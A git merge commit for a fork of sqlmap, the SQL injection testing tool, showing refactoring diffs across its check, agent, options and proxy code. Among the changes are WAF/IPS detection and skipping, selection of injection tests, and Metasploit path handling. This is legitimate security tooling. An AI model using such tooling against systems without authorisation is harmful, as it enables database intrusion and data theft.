Merge remote-tracking branch 'sqlmapproject/master'

This commit is contained in:
cxh852456 2015-10-16 09:32:45 +08:00
commit 2914574b9b
90 changed files with 2264 additions and 1486 deletions

View File

@ -173,6 +173,9 @@ Ivan Giacomelli, <truemilk(at)insiberia.net>
* for suggesting a minor enhancement
* for reviewing the documentation
Dimitris Giannitsaros, <daremon(at)gmail.com>
* for contributing a REST-JSON API client
Nico Golde, <nico(at)ngolde.de>
* for reporting a couple of bugs

View File

@ -76,7 +76,7 @@ def main(src, dst):
# Instantiate an IP packets decoder
decoder = ImpactDecoder.IPDecoder()
while 1:
while True:
cmd = ''
# Wait for incoming replies

View File

@ -22,6 +22,7 @@ from lib.core.common import findDynamicContent
from lib.core.common import Format
from lib.core.common import getLastRequestHTTPError
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getSortedInjectionTests
from lib.core.common import getUnicode
from lib.core.common import intersect
@ -38,6 +39,7 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.common import urlencode
from lib.core.common import wasLastResponseDBMSError
from lib.core.common import wasLastResponseHTTPError
from lib.core.defaults import defaults
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@ -67,6 +69,7 @@ from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.threads import getCurrentThreadData
from lib.request.connect import Connect as Request
from lib.request.inject import checkBooleanExpression
@ -204,6 +207,16 @@ def checkSqlInjection(place, parameter, value):
logger.debug(debugMsg)
continue
# Skip tests if title, vector or DBMS is included by the
# given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg)
continue
if payloadDbms is not None:
# Skip DBMS-specific test if it does not match the user's
# provided DBMS
@ -1139,12 +1152,12 @@ def checkWaf():
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
"""
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)):
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):
return None
dbmMsg = "heuristically checking if the target is protected by "
dbmMsg += "some kind of WAF/IPS/IDS"
logger.debug(dbmMsg)
infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS"
logger.info(infoMsg)
retVal = False
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
@ -1152,12 +1165,16 @@ def checkWaf():
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
pushValue(conf.timeout)
conf.timeout = IDS_WAF_CHECK_TIMEOUT
try:
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
except SqlmapConnectionException:
retVal = True
finally:
kb.matchRatio = None
conf.timeout = popValue()
if retVal:
warnMsg = "heuristics detected that the target "
@ -1172,6 +1189,10 @@ def checkWaf():
if output and output[0] in ("Y", "y"):
conf.identifyWaf = True
if conf.timeout == defaults.timeout:
logger.warning("dropping timeout to %d seconds (i.e. '--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT))
conf.timeout = IDS_WAF_CHECK_TIMEOUT
return retVal
def identifyWaf():
@ -1278,8 +1299,8 @@ def checkNullConnection():
infoMsg = "NULL connection is supported with 'skip-read' method"
logger.info(infoMsg)
except SqlmapConnectionException, errMsg:
errMsg = getUnicode(errMsg)
except SqlmapConnectionException, ex:
errMsg = getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
finally:
@ -1298,7 +1319,7 @@ def checkConnection(suppressOutput=False):
raise SqlmapConnectionException(errMsg)
except socket.error, ex:
errMsg = "problem occurred while "
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message)
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
raise SqlmapConnectionException(errMsg)
if not suppressOutput and not conf.dummy and not conf.offline:
@ -1326,7 +1347,7 @@ def checkConnection(suppressOutput=False):
else:
kb.errorIsNone = True
except SqlmapConnectionException, errMsg:
except SqlmapConnectionException, ex:
if conf.ipv6:
warnMsg = "check connection to a provided "
warnMsg += "IPv6 address with a tool like ping6 "
@ -1336,7 +1357,7 @@ def checkConnection(suppressOutput=False):
singleTimeWarnMessage(warnMsg)
if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
errMsg = getUnicode(errMsg)
errMsg = getSafeExString(ex)
logger.critical(errMsg)
if conf.multipleTargets:

View File

@ -24,7 +24,7 @@ from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult
from lib.core.common import getFilteredPageContent
from lib.core.common import getPublicTypeMembers
from lib.core.common import getUnicode
from lib.core.common import getSafeExString
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
@ -421,6 +421,7 @@ def start():
skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None))
skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None))
skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None))
skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None))
skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True))
skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True))
@ -648,7 +649,7 @@ def start():
raise
except SqlmapBaseException, ex:
errMsg = getUnicode(ex.message)
errMsg = getSafeExString(ex)
if conf.multipleTargets:
errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")

View File

@ -187,12 +187,12 @@ class Agent(object):
if origValue:
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
else:
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
if retVal == paramString and urlencode(parameter) != parameter:
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
if retVal:
retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
@ -308,8 +308,8 @@ class Agent(object):
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, randomStr())
if origValue is not None:
payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if origValue is not None and "[ORIGVALUE]" in payload:
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if "[INFERENCE]" in payload:
if Backend.getIdentifiedDbms() is not None:
@ -480,7 +480,7 @@ class Agent(object):
@rtype: C{str}
"""
prefixRegex = r"(?:\s+(?:FIRST|SKIP)\s+\d+)*"
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*"
fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
@ -501,13 +501,17 @@ class Agent(object):
elif fieldsMinMaxstr:
fieldsToCastStr = fieldsMinMaxstr.groups()[0]
elif fieldsExists:
fieldsToCastStr = fieldsSelect.groups()[0]
if fieldsSelect:
fieldsToCastStr = fieldsSelect.groups()[0]
elif fieldsSelectTop:
fieldsToCastStr = fieldsSelectTop.groups()[0]
elif fieldsSelectRownum:
fieldsToCastStr = fieldsSelectRownum.groups()[0]
elif fieldsSelectDistinct:
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
if Backend.getDbms() in (DBMS.HSQLDB,):
fieldsToCastStr = fieldsNoSelect
else:
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
elif fieldsSelectCase:
fieldsToCastStr = fieldsSelectCase.groups()[0]
elif fieldsSelectFrom:
@ -584,7 +588,7 @@ class Agent(object):
else:
return query
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
if Backend.isDbms(DBMS.MYSQL):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop
@ -611,6 +615,7 @@ class Agent(object):
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
@ -881,12 +886,30 @@ class Agent(object):
fromIndex = limitedQuery.index(" FROM ")
untilFrom = limitedQuery[:fromIndex]
fromFrom = limitedQuery[fromIndex + 1:]
orderBy = False
orderBy = None
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
elif Backend.isDbms(DBMS.HSQLDB):
match = re.search(r"ORDER BY [^ ]+", limitedQuery)
if match:
limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip()
limitedQuery += " %s" % match.group(0)
if query.startswith("SELECT "):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1)
else:
limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num)
limitedQuery += " %s" % limitStr
if not match:
match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery)
if match:
orderBy = " ORDER BY %s" % match.group(1)
elif Backend.isDbms(DBMS.FIREBIRD):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1)
limitedQuery += " %s" % limitStr

View File

@ -79,7 +79,7 @@ class BigArray(list):
self.chunks[-1] = pickle.load(fp)
except IOError, ex:
errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex
errMsg += "from a temporary file ('%s')" % ex.message
raise SqlmapSystemException, errMsg
return self.chunks[-1].pop()
@ -99,7 +99,7 @@ class BigArray(list):
return filename
except (OSError, IOError), ex:
errMsg = "exception occurred while storing data "
errMsg += "to a temporary file ('%s'). Please " % ex
errMsg += "to a temporary file ('%s'). Please " % ex.message
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
@ -115,7 +115,7 @@ class BigArray(list):
self.cache = Cache(index, pickle.load(fp), False)
except IOError, ex:
errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex
errMsg += "from a temporary file ('%s')" % ex.message
raise SqlmapSystemException, errMsg
def __getstate__(self):

View File

@ -879,7 +879,7 @@ def dataToOutFile(filename, data):
f.write(data)
except IOError, ex:
errMsg = "something went wrong while trying to write "
errMsg += "to the output file ('%s')" % ex.message
errMsg += "to the output file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
return retVal
@ -909,14 +909,15 @@ def readInput(message, default=None, checkBatch=True):
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
if answer and question.lower() in message.lower():
retVal = getUnicode(answer, UNICODE_ENCODING)
elif answer is None and retVal:
retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING))
infoMsg = "%s%s" % (message, retVal)
logger.info(infoMsg)
if retVal:
infoMsg = "%s%s" % (message, retVal)
logger.info(infoMsg)
debugMsg = "used the given answer"
logger.debug(debugMsg)
break
debugMsg = "used the given answer"
logger.debug(debugMsg)
if retVal is None:
if checkBatch and conf.get("batch"):
@ -1369,7 +1370,7 @@ def expandAsteriskForColumns(expression):
return expression
def getLimitRange(count, dump=False, plusOne=False):
def getLimitRange(count, plusOne=False):
"""
Returns range of values used in limit/offset constructs
@ -1381,12 +1382,11 @@ def getLimitRange(count, dump=False, plusOne=False):
count = int(count)
limitStart, limitStop = 1, count
if dump:
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)
@ -1622,6 +1622,15 @@ def safeStringFormat(format_, params):
index = retVal.find("%s", start)
retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
else:
if any('%s' in _ for _ in conf.parameters.values()):
parts = format_.split(' ')
for i in xrange(len(parts)):
if PAYLOAD_DELIMITER in parts[i]:
parts[i] = parts[i].replace(PAYLOAD_DELIMITER, "")
parts[i] = "%s%s" % (parts[i], PAYLOAD_DELIMITER)
break
format_ = ' '.join(parts)
count = 0
while True:
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
@ -1866,8 +1875,13 @@ def readCachedFileContent(filename, mode='rb'):
with kb.locks.cache:
if filename not in kb.cache.content:
checkFile(filename)
with openFile(filename, mode) as f:
kb.cache.content[filename] = f.read()
try:
with openFile(filename, mode) as f:
kb.cache.content[filename] = f.read()
except (IOError, OSError, MemoryError), ex:
errMsg = "something went wrong while trying "
errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
raise SqlmapSystemException(errMsg)
return kb.cache.content[filename]
@ -2489,7 +2503,10 @@ def extractTextTagContent(page):
page = page or ""
if REFLECTED_VALUE_MARKER in page:
page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
try:
page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
except MemoryError:
page = page.replace(REFLECTED_VALUE_MARKER, "")
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
@ -2681,7 +2698,7 @@ def parseSqliteTableSchema(value):
table = {}
columns = {}
for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
columns[match.group(1)] = match.group(2)
table[conf.tbl] = columns
@ -2800,7 +2817,13 @@ def unArrayizeValue(value):
"""
if isListLike(value):
value = value[0] if len(value) > 0 else None
if not value:
value = None
elif len(value) == 1 and not isListLike(value[0]):
value = value[0]
else:
_ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value)))
value = _[0] if len(_) > 0 else None
return value
@ -3008,7 +3031,7 @@ def createGithubIssue(errMsg, excMsg):
else:
warnMsg = "something went wrong while creating a Github issue"
if ex:
warnMsg += " ('%s')" % ex
warnMsg += " ('%s')" % getSafeExString(ex)
if "Unauthorized" in warnMsg:
warnMsg += ". Please update to the latest revision"
logger.warn(warnMsg)
@ -3020,7 +3043,7 @@ def maskSensitiveData(msg):
retVal = getUnicode(msg)
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "data", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
while extractRegexResult(regex, retVal):
value = extractRegexResult(regex, retVal)
@ -3567,7 +3590,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
request = form.click()
except (ValueError, TypeError), ex:
errMsg = "there has been a problem while "
errMsg += "processing page forms ('%s')" % ex
errMsg += "processing page forms ('%s')" % getSafeExString(ex)
if raise_:
raise SqlmapGenericException(errMsg)
else:
@ -3670,7 +3693,7 @@ def evaluateCode(code, variables=None):
except KeyboardInterrupt:
raise
except Exception, ex:
errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message
errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
def serializeObject(object_):
@ -3870,13 +3893,18 @@ def decloakToTemp(filename):
"""
content = decloak(filename)
_ = os.path.split(filename[:-1])[-1]
_ = utf8encode(os.path.split(filename[:-1])[-1])
prefix, suffix = os.path.splitext(_)
prefix = prefix.split(os.extsep)[0]
handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(handle)
with open(filename, "w+b") as f:
f.write(content)
return filename
def prioritySortColumns(columns):
@ -3977,3 +4005,18 @@ def pollProcess(process, suppress_errors=False):
dataToStdout(" quit unexpectedly with return code %d\n" % returncode)
break
def getSafeExString(ex, encoding=None):
"""
Safe way how to get the proper exception represtation as a string
(Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161'))
"""
retVal = ex
if getattr(ex, "message", None):
retVal = ex.message
elif getattr(ex, "msg", None):
retVal = ex.msg
return getUnicode(retVal, encoding=encoding)

View File

@ -223,6 +223,7 @@ DEPRECATED_OPTIONS = {
"--replicate": "use '--dump-format=SQLITE' instead",
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
}

View File

@ -15,6 +15,7 @@ import threading
from lib.core.common import Backend
from lib.core.common import dataToDumpFile
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import isListLike
from lib.core.common import normalizeUnicode
@ -74,7 +75,7 @@ class Dump(object):
try:
self._outputFP.write(text)
except IOError, ex:
errMsg = "error occurred while writing to log file ('%s')" % ex.message
errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
if kb.get("multiThreadMode"):
@ -94,7 +95,7 @@ class Dump(object):
try:
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
except IOError, ex:
errMsg = "error occurred while opening log file ('%s')" % ex.message
errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
def getOutputFile(self):
@ -159,7 +160,7 @@ class Dump(object):
def currentDb(self, data):
if Backend.isDbms(DBMS.MAXDB):
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL):
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB):
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
else:
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
@ -635,11 +636,11 @@ class Dump(object):
for column in dbColumnsDict.keys():
if colConsider == "1":
colConsiderStr = "s like '%s' were" % unsafeSQLIdentificatorNaming(column)
colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column)
else:
colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column)
msg = "Column%s found in the " % colConsiderStr
msg = "column%s found in the " % colConsiderStr
msg += "following databases:"
self._write(msg)

View File

@ -27,6 +27,7 @@ import lib.core.common
import lib.core.threads
import lib.core.convert
import lib.request.connect
import lib.utils.google
from lib.controller.checks import checkConnection
from lib.core.common import Backend
@ -34,6 +35,7 @@ from lib.core.common import boldifyMessage
from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import extractRegexResult
from lib.core.common import filterStringValue
from lib.core.common import findPageForms
@ -90,6 +92,7 @@ from lib.core.exception import SqlmapInstallationException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
@ -638,7 +641,7 @@ def _setBulkMultipleTargets():
for line in getFileItems(conf.bulkFile):
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
found = True
kb.targets.add((line.strip(), None, None, None, None))
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
if not found and not conf.forms and not conf.crawlDepth:
warnMsg = "no usable links found (with GET parameters)"
@ -776,6 +779,7 @@ def _setMetasploit():
kb.oldMsf = True
else:
msfEnvPathExists = False
conf.msfPath = path
break
@ -806,7 +810,7 @@ def _setMetasploit():
for envPath in envPaths:
envPath = envPath.replace(";", "")
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")):
msfEnvPathExists = True
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
kb.oldMsf = False
@ -1083,18 +1087,22 @@ def _setHTTPProxy():
if hasattr(proxyHandler, "%s_open" % _):
delattr(proxyHandler, "%s_open" % _)
if not conf.proxy:
if conf.proxyList:
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1]
if conf.proxyList is not None:
if not conf.proxyList:
errMsg = "list of usable proxies is exhausted"
raise SqlmapNoneDataException(errMsg)
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
else:
if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
proxyHandler.proxies = {}
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:]
return
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
elif not conf.proxy:
if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
proxyHandler.proxies = {}
return
debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
logger.debug(debugMsg)
@ -1126,7 +1134,7 @@ def _setHTTPProxy():
if conf.proxyCred:
_ = re.search("^(.*?):(.*?)$", conf.proxyCred)
if not _:
errMsg = "Proxy authentication credentials "
errMsg = "proxy authentication credentials "
errMsg += "value must be in format username:password"
raise SqlmapSyntaxException(errMsg)
else:
@ -1257,13 +1265,13 @@ def _setHTTPAuthentication():
global authHandler
if not conf.authType and not conf.authCred and not conf.authPrivate:
if not conf.authType and not conf.authCred and not conf.authFile:
return
if conf.authPrivate and not conf.authType:
if conf.authFile and not conf.authType:
conf.authType = AUTH_TYPE.PKI
elif conf.authType and not conf.authCred and not conf.authPrivate:
elif conf.authType and not conf.authCred and not conf.authFile:
errMsg = "you specified the HTTP authentication type, but "
errMsg += "did not provide the credentials"
raise SqlmapSyntaxException(errMsg)
@ -1278,7 +1286,7 @@ def _setHTTPAuthentication():
errMsg += "Basic, Digest, NTLM or PKI"
raise SqlmapSyntaxException(errMsg)
if not conf.authPrivate:
if not conf.authFile:
debugMsg = "setting the HTTP authentication type and credentials"
logger.debug(debugMsg)
@ -1329,7 +1337,7 @@ def _setHTTPAuthentication():
debugMsg = "setting the HTTP(s) authentication PEM private key"
logger.debug(debugMsg)
_ = safeExpandUser(conf.authPrivate)
_ = safeExpandUser(conf.authFile)
checkFile(_)
authHandler = HTTPSPKIAuthHandler(_)
@ -1523,7 +1531,7 @@ def _createTemporaryDirectory():
os.makedirs(tempfile.gettempdir())
except IOError, ex:
errMsg = "there has been a problem while accessing "
errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
@ -1627,6 +1635,10 @@ def _cleanupOptions():
conf.testFilter = conf.testFilter.strip('*+')
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
if conf.testSkip:
conf.testSkip = conf.testSkip.strip('*+')
conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
if "timeSec" not in kb.explicitSettings:
if conf.tor:
conf.timeSec = 2 * conf.timeSec
@ -1734,7 +1746,7 @@ def _setConfAttributes():
conf.parameters = {}
conf.path = None
conf.port = None
conf.proxyList = []
conf.proxyList = None
conf.resultsFilename = None
conf.resultsFP = None
conf.scheme = None
@ -2071,7 +2083,7 @@ def _mergeOptions(inputOptions, overrideOptions):
inputOptions = base64unpickle(inputOptions.pickledOptions)
except Exception, ex:
errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions
errMsg += " ('%s')" % ex.message if ex.message else ""
errMsg += " ('%s')" % ex if ex.message else ""
raise SqlmapSyntaxException(errMsg)
if inputOptions.configFile:
@ -2243,7 +2255,11 @@ def _checkTor():
infoMsg = "checking Tor connection"
logger.info(infoMsg)
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
try:
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
except SqlmapConnectionException:
page = None
if not page or 'Congratulations' not in page:
errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
raise SqlmapConnectionException(errMsg)
@ -2290,6 +2306,10 @@ def _basicOptionValidation():
errMsg = "option '-d' is incompatible with option '-u' ('--url')"
raise SqlmapSyntaxException(errMsg)
if conf.identifyWaf and conf.skipWaf:
errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'"
raise SqlmapSyntaxException(errMsg)
if conf.titles and conf.nullConnection:
errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
@ -2404,6 +2424,10 @@ def _basicOptionValidation():
errMsg = "switch '--tor' is incompatible with option '--proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.proxy and conf.proxyFile:
errMsg = "switch '--proxy' is incompatible with option '--proxy-file'"
raise SqlmapSyntaxException(errMsg)
if conf.checkTor and not any((conf.tor, conf.proxy)):
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
raise SqlmapSyntaxException(errMsg)
@ -2471,6 +2495,7 @@ def _resolveCrossReferences():
lib.core.common.getPageTemplate = getPageTemplate
lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
lib.request.connect.setHTTPProxy = _setHTTPProxy
lib.utils.google.setHTTPProxy = _setHTTPProxy
lib.controller.checks.setVerbosity = setVerbosity
def initOptions(inputOptions=AttribDict(), overrideOptions=False):

View File

@ -37,7 +37,7 @@ optDict = {
"headers": "string",
"authType": "string",
"authCred": "string",
"authPrivate": "string",
"authFile": "string",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
@ -205,6 +205,7 @@ optDict = {
"saveConfig": "string",
"scope": "string",
"testFilter": "string",
